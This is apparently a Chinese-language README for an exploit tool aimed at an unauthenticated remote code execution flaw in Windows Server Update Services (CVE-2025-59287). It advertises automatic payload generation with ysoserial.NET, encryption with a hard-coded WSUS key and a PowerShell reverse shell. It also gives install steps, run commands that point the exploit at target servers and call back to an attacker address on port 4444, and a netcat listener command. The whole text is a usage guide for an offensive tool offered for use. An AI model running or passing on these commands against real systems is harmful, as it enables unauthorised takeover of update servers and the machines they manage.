针对 Windows Server Update Services (WSUS) 未认证远程代码执行漏洞的自动化利用工具。
✅ 全自动载荷生成
✅ 自动下载 ysoserial.NET 依赖项
✅ 内置反向 Shell 监听器
✅ 跨平台支持(Windows/Linux/Mac)
✅ 使用 WSUS 硬编码密钥进行 AES 加密
✅ PowerShell 反向 Shell 载荷
pip install -r requirements.txt
sudo apt install wine-stable
sudo apt install mono-complete
克隆或下载漏洞利用文件
cd CVE-2025-59287-exploit
运行漏洞利用(自动下载 ysoserial.NET)
python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
终端 1:启动 netcat 监听器
nc -lvnp 4444
终端 2:运行漏洞利用(不使用内置监听器)
python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener